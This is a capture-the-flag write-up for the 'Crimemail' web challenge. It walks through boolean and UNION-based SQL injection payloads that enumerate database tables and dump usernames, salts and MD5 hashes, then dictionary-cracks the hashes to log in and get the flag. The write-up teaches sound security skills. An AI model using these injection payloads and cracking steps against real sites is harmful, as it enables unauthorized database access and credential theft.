Tags: sqli
Rating:
# ▼▼▼Crimemail - WEB 20 190/549=34.6%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
rvice, to communicate with his associates.
Let's see if you can hack your way in his account...
Hint: his password's md5 is computed as followed: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an english dictionary
```
---
**【Search for vulnerabilities】**
```
POST /hint.php HTTP/1.1
Host: crimemail.ctf.insecurity-insa.fr
Connection: close
Content-Length: 12
Cache-Control: max-age=0
Origin: https://crimemail.ctf.insecurity-insa.fr
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://crimemail.ctf.insecurity-insa.fr/forgot.php
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Cookie: scoreboard=e72d247aba1e8bf23b45240642d98732d1505c8e; PHPSESSID=06ig4gvui8hni0urb7p5bo7rg0
username=%27
```
↓
`username='or'1'='1'--+` ⇒Content-Length: 1331
`username='or'1'='0'--+` ⇒Content-Length: 953
↓
**A SQL injection vulnerability exists!!**
---
**【Get table name】**
username= `'UNION/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA=database()+--+`
↓
```
array(1) {
[0]=>
array(1) {
["hint"]=>
string(5) "users"
}
}
```
↓
**users tables exists!!**
---
**【Get columns name】**
username= `'UNION/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/TABLE_SCHEMA=database()+--+`
↓
```
array(5) {
[0]=>
array(1) {
["hint"]=>
string(6) "userID"
}
[1]=>
array(1) {
["hint"]=>
string(8) "username"
}
[2]=>
array(1) {
["hint"]=>
string(9) "pass_salt"
}
[3]=>
array(1) {
["hint"]=>
string(8) "pass_md5"
}
[4]=>
array(1) {
["hint"]=>
string(4) "hint"
}
}
```
↓
**columuns name are `userID`, `username`, `pass_salt`, `pass_md5`, `hint` !!**
---
**【Get the value of username column】**
username= `'UNION/**/select/**/username/**/from/**/users--+`
↓
```
array(5) {
[0]=>
array(1) {
["hint"]=>
string(9) "p.escobar"
}
[1]=>
array(1) {
["hint"]=>
string(7) "g.dupuy"
}
[2]=>
array(1) {
["hint"]=>
string(8) "a.capone"
}
[3]=>
array(1) {
["hint"]=>
string(8) "c.manson"
}
[4]=>
array(1) {
["hint"]=>
string(8) "c.hackle"
}
}
```
---
**【Get the value of the column】**
username= `'UNION/**/select/**/group_concat(userID,":",username,":",pass_salt,":",pass_md5,":",hint)/**/from/**/users/**/where/**/userID=5--+`
↓
```
array(1) {
[0]=>
array(1) {
["hint"]=>
string(76) "5:c.hackle:yhbG:f2b31b3a7a7c41093321d0c98c37f5ad:I don't need any hints man!"
}
}
```
---
Subsequently acquired similarly
`pass_salt`
↓
`Jdhy`, `Kujh`, `hTjl`, `YbEr`, `yhbG`
---
`pass_md5`
↓
`c4598aadc36b55ba1a4f64f16e2b32f1`, `0fd221fc1358c698ae5db16992703bcd`, `23afc9d3a96e5c338f7ba7da4f8d59f8`, `fe3437f0308c444f0b536841131f5274`,
`f2b31b3a7a7c41093321d0c98c37f5ad`
---
**【Identify password】**
`Hint: his password's md5 is computed as followed: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an english dictionary`
↓
`md5` and `$salt` is known
`$password` are passwordlist
↓
In the local environment, we **brute force using the password list** and identified the password
↓
c4598aadc36b55ba1a4f64f16e2b32f1 ⇒ I could not find it
0fd221fc1358c698ae5db16992703bcd ⇒ I could not find it
23afc9d3a96e5c338f7ba7da4f8d59f8 ⇒ `scarface`
fe3437f0308c444f0b536841131f5274 ⇒ `murders`
f2b31b3a7a7c41093321d0c98c37f5ad ⇒ `pizza`
---
I logged in with `c.hackle` and `pizza`
↓
```
UNKNOWN SENDER says:
Meet me at INSA{s3cr3t_l0cat10n}
```
↓
`INSA{s3cr3t_l0cat10n}`